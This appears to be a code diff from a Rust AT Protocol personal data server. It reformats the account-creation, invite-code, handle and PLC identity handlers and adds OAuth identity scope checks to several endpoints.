match invite_query {
535
-
Ok(Some(row)) => {
536
-
if row.available_uses <= 0 {
537
-
return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidInviteCode", "message": "Invite code exhausted"}))).into_response();
538
-
}
539
-
let update_invite = sqlx::query!(
540
-
"UPDATE invite_codes SET available_uses = available_uses - 1 WHERE code = $1",
541
-
code
542
-
)
543
-
.execute(&mut *tx)
544
-
.await;
545
-
if let Err(e) = update_invite {
546
-
error!("Error updating invite code: {:?}", e);
547
-
return (
548
-
StatusCode::INTERNAL_SERVER_ERROR,
549
-
Json(json!({"error": "InternalError"})),
550
-
)
551
-
.into_response();
552
-
}
553
}
554
-
Ok(None) => {
555
-
return (
556
-
StatusCode::BAD_REQUEST,
557
-
Json(json!({"error": "InvalidInviteCode", "message": "Invite code not found"})),
558
-
)
559
-
.into_response();
560
-
}
561
-
Err(e) => {
562
-
error!("Error checking invite code: {:?}", e);
563
return (
564
StatusCode::INTERNAL_SERVER_ERROR,
565
Json(json!({"error": "InternalError"})),
566
)
567
.into_response();
568
}
569
}
570
}
571
}
···
635
Ok((id,)) => id,
636
Err(e) => {
637
if let Some(db_err) = e.as_database_error()
638
-
&& db_err.code().as_deref() == Some("23505") {
639
-
let constraint = db_err.constraint().unwrap_or("");
640
-
if constraint.contains("handle") || constraint.contains("users_handle") {
641
-
return (
642
-
StatusCode::BAD_REQUEST,
643
-
Json(json!({
644
-
"error": "HandleNotAvailable",
645
-
"message": "Handle already taken"
646
-
})),
647
-
)
648
-
.into_response();
649
-
} else if constraint.contains("email") || constraint.contains("users_email") {
650
-
return (
651
-
StatusCode::BAD_REQUEST,
652
-
Json(json!({
653
-
"error": "InvalidEmail",
654
-
"message": "Email already registered"
655
-
})),
656
-
)
657
-
.into_response();
658
-
} else if constraint.contains("did") || constraint.contains("users_did") {
659
-
return (
660
-
StatusCode::BAD_REQUEST,
661
-
Json(json!({
662
-
"error": "AccountAlreadyExists",
663
-
"message": "An account with this DID already exists"
664
-
})),
665
-
)
666
-
.into_response();
667
-
}
668
}
669
error!("Error inserting user: {:?}", e);
670
return (
671
StatusCode::INTERNAL_SERVER_ERROR,
···
675
}
676
};
677
678
-
if !is_migration {
679
-
if let Err(e) = sqlx::query!(
680
"INSERT INTO channel_verifications (user_id, channel, code, pending_identifier, expires_at) VALUES ($1, 'email', $2, $3, $4)",
681
user_id,
682
verification_code,
···
692
)
693
.into_response();
694
}
695
-
}
696
let encrypted_key_bytes = match crate::config::encrypt_key(&secret_key_bytes) {
697
Ok(enc) => enc,
698
Err(e) => {
···
809
)
810
.into_response();
811
}
812
-
if let Some(code) = &input.invite_code {
813
-
if !code.trim().is_empty() {
814
-
let use_insert = sqlx::query!(
815
-
"INSERT INTO invite_code_uses (code, used_by_user) VALUES ($1, $2)",
816
-
code,
817
-
user_id
818
)
819
-
.execute(&mut *tx)
820
-
.await;
821
-
if let Err(e) = use_insert {
822
-
error!("Error recording invite usage: {:?}", e);
823
-
return (
824
-
StatusCode::INTERNAL_SERVER_ERROR,
825
-
Json(json!({"error": "InternalError"})),
826
-
)
827
-
.into_response();
828
-
}
829
}
830
}
831
if let Err(e) = tx.commit().await {
···
838
}
839
if !is_migration {
840
if let Err(e) =
841
-
crate::api::repo::record::sequence_identity_event(&state, &did, Some(&full_handle)).await
842
{
843
warn!("Failed to sequence identity event for {}: {}", did, e);
844
}
845
-
if let Err(e) = crate::api::repo::record::sequence_account_event(&state, &did, true, None).await
846
{
847
warn!("Failed to sequence account event for {}: {}", did, e);
848
}
···
861
{
862
warn!("Failed to create default profile for {}: {}", did, e);
863
}
864
-
if let Some(ref recipient) = verification_recipient {
865
-
if let Err(e) = crate::comms::enqueue_signup_verification(
866
&state.db,
867
user_id,
868
verification_channel,
···
870
&verification_code,
871
)
872
.await
873
-
{
874
-
warn!(
875
-
"Failed to enqueue signup verification notification: {:?}",
876
-
e
877
-
);
878
-
}
879
}
880
}
881
···
21
fn extract_client_ip(headers: &HeaderMap) -> String {
22
if let Some(forwarded) = headers.get("x-forwarded-for")
23
&& let Ok(value) = forwarded.to_str()
24
+
&& let Some(first_ip) = value.split(',').next()
25
+
{
26
+
return first_ip.trim().to_string();
27
+
}
28
if let Some(real_ip) = headers.get("x-real-ip")
29
+
&& let Ok(value) = real_ip.to_str()
30
+
{
31
+
return value.trim().to_string();
32
+
}
33
"unknown".to_string()
34
}
35
···
116
};
117
118
let is_migration = migration_auth.is_some()
119
+
&& input
120
+
.did
121
+
.as_ref()
122
+
.map(|d| d.starts_with("did:plc:"))
123
+
.unwrap_or(false);
124
125
if is_migration {
126
let migration_did = input.did.as_ref().unwrap();
···
153
.map(|e| e.trim().to_string())
154
.filter(|e| !e.is_empty());
155
if let Some(ref email) = email
156
+
&& !crate::api::validation::is_valid_email(email)
157
+
{
158
+
return (
159
+
StatusCode::BAD_REQUEST,
160
+
Json(json!({"error": "InvalidEmail", "message": "Invalid email format"})),
161
+
)
162
+
.into_response();
163
+
}
164
let verification_channel = input.verification_channel.as_deref().unwrap_or("email");
165
let valid_channels = ["email", "discord", "telegram", "signal"];
166
if !valid_channels.contains(&verification_channel) && !is_migration {
···
373
};
374
if is_migration {
375
let existing_account: Option<(uuid::Uuid, String, Option<chrono::DateTime<chrono::Utc>>)> =
376
+
sqlx::query_as("SELECT id, handle, deactivated_at FROM users WHERE did = $1 FOR UPDATE")
377
+
.bind(&did)
378
+
.fetch_optional(&mut *tx)
379
+
.await
380
+
.unwrap_or(None);
381
if let Some((account_id, old_handle, deactivated_at)) = existing_account {
382
if deactivated_at.is_some() {
383
info!(did = %did, old_handle = %old_handle, new_handle = %short_handle, "Preparing existing account for inbound migration");
384
+
let update_result: Result<_, sqlx::Error> =
385
+
sqlx::query("UPDATE users SET handle = $1 WHERE id = $2")
386
+
.bind(short_handle)
387
+
.bind(account_id)
388
+
.execute(&mut *tx)
389
+
.await;
390
if let Err(e) = update_result {
391
+
if let Some(db_err) = e.as_database_error()
392
+
&& db_err
393
+
.constraint()
394
+
.map(|c| c.contains("handle"))
395
+
.unwrap_or(false)
396
+
{
397
+
return (
398
StatusCode::BAD_REQUEST,
399
Json(json!({"error": "HandleTaken", "message": "Handle already taken by another account"})),
400
)
401
.into_response();
402
}
403
error!("Error reactivating account: {:?}", e);
404
return (
···
445
.into_response();
446
}
447
};
448
+
let access_meta =
449
+
match crate::auth::create_access_token_with_metadata(&did, &secret_key_bytes) {
450
+
Ok(m) => m,
451
+
Err(e) => {
452
+
error!("Error creating access token: {:?}", e);
453
+
return (
454
+
StatusCode::INTERNAL_SERVER_ERROR,
455
+
Json(json!({"error": "InternalError"})),
456
+
)
457
+
.into_response();
458
+
}
459
+
};
460
+
let refresh_meta = match crate::auth::create_refresh_token_with_metadata(
461
+
&did,
462
+
&secret_key_bytes,
463
+
) {
464
Ok(m) => m,
465
Err(e) => {
466
error!("Error creating refresh token: {:?}", e);
···
510
}
511
}
512
}
513
+
let exists_result: Option<(i32,)> =
514
+
sqlx::query_as("SELECT 1 FROM users WHERE handle = $1 AND deactivated_at IS NULL")
515
+
.bind(short_handle)
516
+
.fetch_optional(&mut *tx)
517
+
.await
518
+
.unwrap_or(None);
519
if exists_result.is_some() {
520
return (
521
StatusCode::BAD_REQUEST,
···
526
let invite_code_required = std::env::var("INVITE_CODE_REQUIRED")
527
.map(|v| v == "true" || v == "1")
528
.unwrap_or(false);
529
+
if invite_code_required
530
+
&& input
531
+
.invite_code
532
+
.as_ref()
533
+
.map(|c| c.trim().is_empty())
534
+
.unwrap_or(true)
535
+
{
536
return (
537
StatusCode::BAD_REQUEST,
538
Json(json!({"error": "InvalidInviteCode", "message": "Invite code is required"})),
539
)
540
.into_response();
541
}
542
+
if let Some(code) = &input.invite_code
543
+
&& !code.trim().is_empty()
544
+
{
545
+
let invite_query = sqlx::query!(
546
+
"SELECT available_uses FROM invite_codes WHERE code = $1 FOR UPDATE",
547
+
code
548
+
)
549
+
.fetch_optional(&mut *tx)
550
+
.await;
551
+
match invite_query {
552
+
Ok(Some(row)) => {
553
+
if row.available_uses <= 0 {
554
+
return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidInviteCode", "message": "Invite code exhausted"}))).into_response();
555
}
556
+
let update_invite = sqlx::query!(
557
+
"UPDATE invite_codes SET available_uses = available_uses - 1 WHERE code = $1",
558
+
code
559
+
)
560
+
.execute(&mut *tx)
561
+
.await;
562
+
if let Err(e) = update_invite {
563
+
error!("Error updating invite code: {:?}", e);
564
return (
565
StatusCode::INTERNAL_SERVER_ERROR,
566
Json(json!({"error": "InternalError"})),
567
)
568
.into_response();
569
}
570
+
}
571
+
Ok(None) => {
572
+
return (
573
+
StatusCode::BAD_REQUEST,
574
+
Json(json!({"error": "InvalidInviteCode", "message": "Invite code not found"})),
575
+
)
576
+
.into_response();
577
+
}
578
+
Err(e) => {
579
+
error!("Error checking invite code: {:?}", e);
580
+
return (
581
+
StatusCode::INTERNAL_SERVER_ERROR,
582
+
Json(json!({"error": "InternalError"})),
583
+
)
584
+
.into_response();
585
}
586
}
587
}
···
651
Ok((id,)) => id,
652
Err(e) => {
653
if let Some(db_err) = e.as_database_error()
654
+
&& db_err.code().as_deref() == Some("23505")
655
+
{
656
+
let constraint = db_err.constraint().unwrap_or("");
657
+
if constraint.contains("handle") || constraint.contains("users_handle") {
658
+
return (
659
+
StatusCode::BAD_REQUEST,
660
+
Json(json!({
661
+
"error": "HandleNotAvailable",
662
+
"message": "Handle already taken"
663
+
})),
664
+
)
665
+
.into_response();
666
+
} else if constraint.contains("email") || constraint.contains("users_email") {
667
+
return (
668
+
StatusCode::BAD_REQUEST,
669
+
Json(json!({
670
+
"error": "InvalidEmail",
671
+
"message": "Email already registered"
672
+
})),
673
+
)
674
+
.into_response();
675
+
} else if constraint.contains("did") || constraint.contains("users_did") {
676
+
return (
677
+
StatusCode::BAD_REQUEST,
678
+
Json(json!({
679
+
"error": "AccountAlreadyExists",
680
+
"message": "An account with this DID already exists"
681
+
})),
682
+
)
683
+
.into_response();
684
}
685
+
}
686
error!("Error inserting user: {:?}", e);
687
return (
688
StatusCode::INTERNAL_SERVER_ERROR,
···
692
}
693
};
694
695
+
if !is_migration
696
+
&& let Err(e) = sqlx::query!(
697
"INSERT INTO channel_verifications (user_id, channel, code, pending_identifier, expires_at) VALUES ($1, 'email', $2, $3, $4)",
698
user_id,
699
verification_code,
···
709
)
710
.into_response();
711
}
712
let encrypted_key_bytes = match crate::config::encrypt_key(&secret_key_bytes) {
713
Ok(enc) => enc,
714
Err(e) => {
···
825
)
826
.into_response();
827
}
828
+
if let Some(code) = &input.invite_code
829
+
&& !code.trim().is_empty()
830
+
{
831
+
let use_insert = sqlx::query!(
832
+
"INSERT INTO invite_code_uses (code, used_by_user) VALUES ($1, $2)",
833
+
code,
834
+
user_id
835
+
)
836
+
.execute(&mut *tx)
837
+
.await;
838
+
if let Err(e) = use_insert {
839
+
error!("Error recording invite usage: {:?}", e);
840
+
return (
841
+
StatusCode::INTERNAL_SERVER_ERROR,
842
+
Json(json!({"error": "InternalError"})),
843
)
844
+
.into_response();
845
}
846
}
847
if let Err(e) = tx.commit().await {
···
854
}
855
if !is_migration {
856
if let Err(e) =
857
+
crate::api::repo::record::sequence_identity_event(&state, &did, Some(&full_handle))
858
+
.await
859
{
860
warn!("Failed to sequence identity event for {}: {}", did, e);
861
}
862
+
if let Err(e) =
863
+
crate::api::repo::record::sequence_account_event(&state, &did, true, None).await
864
{
865
warn!("Failed to sequence account event for {}: {}", did, e);
866
}
···
879
{
880
warn!("Failed to create default profile for {}: {}", did, e);
881
}
882
+
if let Some(ref recipient) = verification_recipient
883
+
&& let Err(e) = crate::comms::enqueue_signup_verification(
884
&state.db,
885
user_id,
886
verification_channel,
···
888
&verification_code,
889
)
890
.await
891
+
{
892
+
warn!(
893
+
"Failed to enqueue signup verification notification: {:?}",
894
+
e
895
+
);
896
}
897
}
898
+37
-25
src/api/identity/did.rs
+37
-25
src/api/identity/did.rs
···
54
.await;
55
(StatusCode::OK, Json(json!({ "did": row.did }))).into_response()
56
}
57
-
Ok(None) => {
58
-
match crate::handle::resolve_handle(handle).await {
59
-
Ok(did) => {
60
-
let _ = state
61
-
.cache
62
-
.set(&cache_key, &did, std::time::Duration::from_secs(300))
63
-
.await;
64
-
(StatusCode::OK, Json(json!({ "did": did }))).into_response()
65
-
}
66
-
Err(_) => (
67
-
StatusCode::NOT_FOUND,
68
-
Json(json!({"error": "HandleNotFound", "message": "Unable to resolve handle"})),
69
-
)
70
-
.into_response(),
71
}
72
-
}
73
Err(e) => {
74
error!("DB error resolving handle: {:?}", e);
75
(
···
310
.into_response();
311
}
312
};
313
-
let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await {
314
-
Ok(user) => user,
315
-
Err(e) => return ApiError::from(e).into_response(),
316
-
};
317
let user = match sqlx::query!(
318
"SELECT handle FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.did = $1",
319
auth_user.did
···
378
Some(t) => t,
379
None => return ApiError::AuthenticationRequired.into_response(),
380
};
381
-
let did = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await {
382
-
Ok(user) => user.did,
383
-
Err(e) => return ApiError::from(e).into_response(),
384
-
};
385
let user_id = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
386
.fetch_optional(&state.db)
387
.await
···
414
} else {
415
new_handle
416
};
417
-
(short_handle.to_string(), format!("{}.{}", short_handle, hostname))
418
} else {
419
match crate::handle::verify_handle_ownership(new_handle, &did).await {
420
Ok(()) => {}
···
537
let plc_client = crate::plc::PlcClient::new(None);
538
let last_op = plc_client.get_last_op(did).await?;
539
let new_also_known_as = vec![format!("at://{}", new_handle)];
540
-
let update_op = crate::plc::create_update_op(&last_op, None, None, Some(new_also_known_as), None)?;
541
let signed_op = crate::plc::sign_operation(&update_op, &signing_key)?;
542
plc_client.send_operation(did, &signed_op).await?;
543
Ok(())
···
54
.await;
55
(StatusCode::OK, Json(json!({ "did": row.did }))).into_response()
56
}
57
+
Ok(None) => match crate::handle::resolve_handle(handle).await {
58
+
Ok(did) => {
59
+
let _ = state
60
+
.cache
61
+
.set(&cache_key, &did, std::time::Duration::from_secs(300))
62
+
.await;
63
+
(StatusCode::OK, Json(json!({ "did": did }))).into_response()
64
}
65
+
Err(_) => (
66
+
StatusCode::NOT_FOUND,
67
+
Json(json!({"error": "HandleNotFound", "message": "Unable to resolve handle"})),
68
+
)
69
+
.into_response(),
70
+
},
71
Err(e) => {
72
error!("DB error resolving handle: {:?}", e);
73
(
···
308
.into_response();
309
}
310
};
311
+
let auth_user =
312
+
match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await {
313
+
Ok(user) => user,
314
+
Err(e) => return ApiError::from(e).into_response(),
315
+
};
316
let user = match sqlx::query!(
317
"SELECT handle FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.did = $1",
318
auth_user.did
···
377
Some(t) => t,
378
None => return ApiError::AuthenticationRequired.into_response(),
379
};
380
+
let auth_user =
381
+
match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await {
382
+
Ok(user) => user,
383
+
Err(e) => return ApiError::from(e).into_response(),
384
+
};
385
+
if let Err(e) = crate::auth::scope_check::check_identity_scope(
386
+
auth_user.is_oauth,
387
+
auth_user.scope.as_deref(),
388
+
crate::oauth::scopes::IdentityAttr::Handle,
389
+
) {
390
+
return e;
391
+
}
392
+
let did = auth_user.did;
393
let user_id = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
394
.fetch_optional(&state.db)
395
.await
···
422
} else {
423
new_handle
424
};
425
+
(
426
+
short_handle.to_string(),
427
+
format!("{}.{}", short_handle, hostname),
428
+
)
429
} else {
430
match crate::handle::verify_handle_ownership(new_handle, &did).await {
431
Ok(()) => {}
···
548
let plc_client = crate::plc::PlcClient::new(None);
549
let last_op = plc_client.get_last_op(did).await?;
550
let new_also_known_as = vec![format!("at://{}", new_handle)];
551
+
let update_op =
552
+
crate::plc::create_update_op(&last_op, None, None, Some(new_also_known_as), None)?;
553
let signed_op = crate::plc::sign_operation(&update_op, &signing_key)?;
554
plc_client.send_operation(did, &signed_op).await?;
555
Ok(())
+12
-4
src/api/identity/plc/request.rs
+12
-4
src/api/identity/plc/request.rs
···
24
Some(t) => t,
25
None => return ApiError::AuthenticationRequired.into_response(),
26
};
27
-
let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await {
28
-
Ok(user) => user,
29
-
Err(e) => return ApiError::from(e).into_response(),
30
-
};
31
let user = match sqlx::query!("SELECT id FROM users WHERE did = $1", auth_user.did)
32
.fetch_optional(&state.db)
33
.await
···
24
Some(t) => t,
25
None => return ApiError::AuthenticationRequired.into_response(),
26
};
27
+
let auth_user =
28
+
match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await {
29
+
Ok(user) => user,
30
+
Err(e) => return ApiError::from(e).into_response(),
31
+
};
32
+
if let Err(e) = crate::auth::scope_check::check_identity_scope(
33
+
auth_user.is_oauth,
34
+
auth_user.scope.as_deref(),
35
+
crate::oauth::scopes::IdentityAttr::Wildcard,
36
+
) {
37
+
return e;
38
+
}
39
let user = match sqlx::query!("SELECT id FROM users WHERE did = $1", auth_user.did)
40
.fetch_optional(&state.db)
41
.await
+12
-4
src/api/identity/plc/sign.rs
+12
-4
src/api/identity/plc/sign.rs
···
50
Some(t) => t,
51
None => return ApiError::AuthenticationRequired.into_response(),
52
};
53
-
let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &bearer).await {
54
-
Ok(user) => user,
55
-
Err(e) => return ApiError::from(e).into_response(),
56
-
};
57
let did = &auth_user.did;
58
let token = match &input.token {
59
Some(t) => t,
···
50
Some(t) => t,
51
None => return ApiError::AuthenticationRequired.into_response(),
52
};
53
+
let auth_user =
54
+
match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &bearer).await {
55
+
Ok(user) => user,
56
+
Err(e) => return ApiError::from(e).into_response(),
57
+
};
58
+
if let Err(e) = crate::auth::scope_check::check_identity_scope(
59
+
auth_user.is_oauth,
60
+
auth_user.scope.as_deref(),
61
+
crate::oauth::scopes::IdentityAttr::Wildcard,
62
+
) {
63
+
return e;
64
+
}
65
let did = &auth_user.did;
66
let token = match &input.token {
67
Some(t) => t,
+71
-58
src/api/identity/plc/submit.rs
+71
-58
src/api/identity/plc/submit.rs
···
29
Some(t) => t,
30
None => return ApiError::AuthenticationRequired.into_response(),
31
};
32
-
let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &bearer).await {
33
-
Ok(user) => user,
34
-
Err(e) => return ApiError::from(e).into_response(),
35
-
};
36
let did = &auth_user.did;
37
if let Err(e) = validate_plc_operation(&input.operation) {
38
return ApiError::InvalidRequest(format!("Invalid operation: {}", e)).into_response();
···
40
let op = &input.operation;
41
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
42
let public_url = format!("https://{}", hostname);
43
-
let user = match sqlx::query!("SELECT id, handle, deactivated_at FROM users WHERE did = $1", did)
44
-
.fetch_optional(&state.db)
45
-
.await
46
{
47
Ok(Some(row)) => row,
48
_ => {
···
94
}
95
};
96
let user_did_key = signing_key_to_did_key(&signing_key);
97
-
if !is_migration {
98
-
if let Some(rotation_keys) = op.get("rotationKeys").and_then(|v| v.as_array()) {
99
-
let server_rotation_key =
100
-
std::env::var("PLC_ROTATION_KEY").unwrap_or_else(|_| user_did_key.clone());
101
-
let has_server_key = rotation_keys
102
-
.iter()
103
-
.any(|k| k.as_str() == Some(&server_rotation_key));
104
-
if !has_server_key {
105
-
return (
106
-
StatusCode::BAD_REQUEST,
107
-
Json(json!({
108
-
"error": "InvalidRequest",
109
-
"message": "Rotation keys do not include server's rotation key"
110
-
})),
111
-
)
112
-
.into_response();
113
-
}
114
}
115
}
116
if let Some(services) = op.get("services").and_then(|v| v.as_object())
117
-
&& let Some(pds) = services.get("atproto_pds").and_then(|v| v.as_object()) {
118
-
let service_type = pds.get("type").and_then(|v| v.as_str());
119
-
let endpoint = pds.get("endpoint").and_then(|v| v.as_str());
120
-
if service_type != Some("AtprotoPersonalDataServer") {
121
-
return (
122
-
StatusCode::BAD_REQUEST,
123
-
Json(json!({
124
-
"error": "InvalidRequest",
125
-
"message": "Incorrect type on atproto_pds service"
126
-
})),
127
-
)
128
-
.into_response();
129
-
}
130
-
if endpoint != Some(&public_url) {
131
-
return (
132
-
StatusCode::BAD_REQUEST,
133
-
Json(json!({
134
-
"error": "InvalidRequest",
135
-
"message": "Incorrect endpoint on atproto_pds service"
136
-
})),
137
-
)
138
-
.into_response();
139
-
}
140
}
141
if !is_migration {
142
-
if let Some(verification_methods) = op.get("verificationMethods").and_then(|v| v.as_object())
143
&& let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str())
144
-
&& atproto_key != user_did_key {
145
-
return (
146
-
StatusCode::BAD_REQUEST,
147
-
Json(json!({
148
-
"error": "InvalidRequest",
149
-
"message": "Incorrect signing key in verificationMethods"
150
-
})),
151
-
)
152
-
.into_response();
153
-
}
154
if let Some(also_known_as) = op.get("alsoKnownAs").and_then(|v| v.as_array()) {
155
let expected_handle = format!("at://{}", user.handle);
156
let first_aka = also_known_as.first().and_then(|v| v.as_str());
···
29
Some(t) => t,
30
None => return ApiError::AuthenticationRequired.into_response(),
31
};
32
+
let auth_user =
33
+
match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &bearer).await {
34
+
Ok(user) => user,
35
+
Err(e) => return ApiError::from(e).into_response(),
36
+
};
37
+
if let Err(e) = crate::auth::scope_check::check_identity_scope(
38
+
auth_user.is_oauth,
39
+
auth_user.scope.as_deref(),
40
+
crate::oauth::scopes::IdentityAttr::Wildcard,
41
+
) {
42
+
return e;
43
+
}
44
let did = &auth_user.did;
45
if let Err(e) = validate_plc_operation(&input.operation) {
46
return ApiError::InvalidRequest(format!("Invalid operation: {}", e)).into_response();
···
48
let op = &input.operation;
49
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
50
let public_url = format!("https://{}", hostname);
51
+
let user = match sqlx::query!(
52
+
"SELECT id, handle, deactivated_at FROM users WHERE did = $1",
53
+
did
54
+
)
55
+
.fetch_optional(&state.db)
56
+
.await
57
{
58
Ok(Some(row)) => row,
59
_ => {
···
105
}
106
};
107
let user_did_key = signing_key_to_did_key(&signing_key);
108
+
if !is_migration && let Some(rotation_keys) = op.get("rotationKeys").and_then(|v| v.as_array())
109
+
{
110
+
let server_rotation_key =
111
+
std::env::var("PLC_ROTATION_KEY").unwrap_or_else(|_| user_did_key.clone());
112
+
let has_server_key = rotation_keys
113
+
.iter()
114
+
.any(|k| k.as_str() == Some(&server_rotation_key));
115
+
if !has_server_key {
116
+
return (
117
+
StatusCode::BAD_REQUEST,
118
+
Json(json!({
119
+
"error": "InvalidRequest",
120
+
"message": "Rotation keys do not include server's rotation key"
121
+
})),
122
+
)
123
+
.into_response();
124
}
125
}
126
if let Some(services) = op.get("services").and_then(|v| v.as_object())
127
+
&& let Some(pds) = services.get("atproto_pds").and_then(|v| v.as_object())
128
+
{
129
+
let service_type = pds.get("type").and_then(|v| v.as_str());
130
+
let endpoint = pds.get("endpoint").and_then(|v| v.as_str());
131
+
if service_type != Some("AtprotoPersonalDataServer") {
132
+
return (
133
+
StatusCode::BAD_REQUEST,
134
+
Json(json!({
135
+
"error": "InvalidRequest",
136
+
"message": "Incorrect type on atproto_pds service"
137
+
})),
138
+
)
139
+
.into_response();
140
}
141
+
if endpoint != Some(&public_url) {
142
+
return (
143
+
StatusCode::BAD_REQUEST,
144
+
Json(json!({
145
+
"error": "InvalidRequest",
146
+
"message": "Incorrect endpoint on atproto_pds service"
147
+
})),
148
+
)
149
+
.into_response();
150
+
}
151
+
}
152
if !is_migration {
153
+
if let Some(verification_methods) =
154
+
op.get("verificationMethods").and_then(|v| v.as_object())
155
&& let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str())
156
+
&& atproto_key != user_did_key
157
+
{
158
+
return (
159
+
StatusCode::BAD_REQUEST,
160
+
Json(json!({
161
+
"error": "InvalidRequest",
162
+
"message": "Incorrect signing key in verificationMethods"
163
+
})),
164
+
)
165
+
.into_response();
166
+
}
167
if let Some(also_known_as) = op.get("alsoKnownAs").and_then(|v| v.as_array()) {
168
let expected_handle = format!("at://{}", user.handle);
169
let first_aka = also_known_as.first().and_then(|v| v.as_str());
+72
-46
src/api/notification_prefs.rs
+72
-46
src/api/notification_prefs.rs
···
147
}
148
};
149
150
-
let user_id: uuid::Uuid = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", user.did)
151
-
.fetch_one(&state.db)
152
-
.await
153
-
{
154
-
Ok(id) => id,
155
-
Err(e) => return (
156
-
StatusCode::INTERNAL_SERVER_ERROR,
157
-
Json(json!({"error": "InternalError", "message": format!("Database error: {}", e)})),
158
-
)
159
-
.into_response(),
160
-
};
161
162
-
let rows = match sqlx::query!(
163
-
r#"
164
SELECT
165
created_at,
166
channel as "channel: String",
···
173
ORDER BY created_at DESC
174
LIMIT 50
175
"#,
176
-
user_id
177
-
)
178
-
.fetch_all(&state.db)
179
-
.await
180
-
{
181
-
Ok(r) => r,
182
-
Err(e) => return (
183
-
StatusCode::INTERNAL_SERVER_ERROR,
184
-
Json(json!({"error": "InternalError", "message": format!("Database error: {}", e)})),
185
)
186
-
.into_response(),
187
-
};
188
189
-
let notifications = rows.iter().map(|row| {
190
-
NotificationHistoryEntry {
191
created_at: row.created_at.to_rfc3339(),
192
channel: row.channel.clone(),
193
comms_type: row.comms_type.clone(),
194
status: row.status.clone(),
195
subject: row.subject.clone(),
196
body: row.body.clone(),
197
-
}
198
-
}).collect();
199
200
Json(GetNotificationHistoryResponse { notifications }).into_response()
201
}
···
297
}
298
};
299
300
-
let user_row = match sqlx::query!(
301
-
"SELECT id, handle, email FROM users WHERE did = $1",
302
-
user.did
303
-
)
304
-
.fetch_one(&state.db)
305
-
.await
306
-
{
307
-
Ok(row) => row,
308
-
Err(e) => return (
309
-
StatusCode::INTERNAL_SERVER_ERROR,
310
-
Json(json!({"error": "InternalError", "message": format!("Database error: {}", e)})),
311
)
312
-
.into_response(),
313
-
};
314
315
let user_id = user_row.id;
316
let handle = user_row.handle;
···
384
.into_response();
385
}
386
387
-
if let Err(e) = request_channel_verification(&state.db, user_id, "email", &email_clean, Some(&handle)).await {
388
return (
389
StatusCode::INTERNAL_SERVER_ERROR,
390
Json(json!({"error": "InternalError", "message": e})),
···
419
.await;
420
info!(did = %user.did, "Cleared Discord ID");
421
} else {
422
-
if let Err(e) = request_channel_verification(&state.db, user_id, "discord", discord_id, None).await {
423
return (
424
StatusCode::INTERNAL_SERVER_ERROR,
425
Json(json!({"error": "InternalError", "message": e})),
···
455
.await;
456
info!(did = %user.did, "Cleared Telegram username");
457
} else {
458
-
if let Err(e) = request_channel_verification(&state.db, user_id, "telegram", telegram_clean, None).await {
459
return (
460
StatusCode::INTERNAL_SERVER_ERROR,
461
Json(json!({"error": "InternalError", "message": e})),
···
490
.await;
491
info!(did = %user.did, "Cleared Signal number");
492
} else {
493
-
if let Err(e) = request_channel_verification(&state.db, user_id, "signal", signal, None).await {
494
return (
495
StatusCode::INTERNAL_SERVER_ERROR,
496
Json(json!({"error": "InternalError", "message": e})),
···
505
Json(UpdateNotificationPrefsResponse {
506
success: true,
507
verification_required,
508
-
}).into_response()
509
}
···
147
}
148
};
149
150
+
let user_id: uuid::Uuid =
151
+
match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", user.did)
152
+
.fetch_one(&state.db)
153
+
.await
154
+
{
155
+
Ok(id) => id,
156
+
Err(e) => return (
157
+
StatusCode::INTERNAL_SERVER_ERROR,
158
+
Json(
159
+
json!({"error": "InternalError", "message": format!("Database error: {}", e)}),
160
+
),
161
+
)
162
+
.into_response(),
163
+
};
164
165
+
let rows =
166
+
match sqlx::query!(
167
+
r#"
168
SELECT
169
created_at,
170
channel as "channel: String",
···
177
ORDER BY created_at DESC
178
LIMIT 50
179
"#,
180
+
user_id
181
)
182
+
.fetch_all(&state.db)
183
+
.await
184
+
{
185
+
Ok(r) => r,
186
+
Err(e) => return (
187
+
StatusCode::INTERNAL_SERVER_ERROR,
188
+
Json(
189
+
json!({"error": "InternalError", "message": format!("Database error: {}", e)}),
190
+
),
191
+
)
192
+
.into_response(),
193
+
};
194
195
+
let notifications = rows
196
+
.iter()
197
+
.map(|row| NotificationHistoryEntry {
198
created_at: row.created_at.to_rfc3339(),
199
channel: row.channel.clone(),
200
comms_type: row.comms_type.clone(),
201
status: row.status.clone(),
202
subject: row.subject.clone(),
203
body: row.body.clone(),
204
+
})
205
+
.collect();
206
207
Json(GetNotificationHistoryResponse { notifications }).into_response()
208
}
···
304
}
305
};
306
307
+
let user_row =
308
+
match sqlx::query!(
309
+
"SELECT id, handle, email FROM users WHERE did = $1",
310
+
user.did
311
)
312
+
.fetch_one(&state.db)
313
+
.await
314
+
{
315
+
Ok(row) => row,
316
+
Err(e) => return (
317
+
StatusCode::INTERNAL_SERVER_ERROR,
318
+
Json(
319
+
json!({"error": "InternalError", "message": format!("Database error: {}", e)}),
320
+
),
321
+
)
322
+
.into_response(),
323
+
};
324
325
let user_id = user_row.id;
326
let handle = user_row.handle;
···
394
.into_response();
395
}
396
397
+
if let Err(e) = request_channel_verification(
398
+
&state.db,
399
+
user_id,
400
+
"email",
401
+
&email_clean,
402
+
Some(&handle),
403
+
)
404
+
.await
405
+
{
406
return (
407
StatusCode::INTERNAL_SERVER_ERROR,
408
Json(json!({"error": "InternalError", "message": e})),
···
437
.await;
438
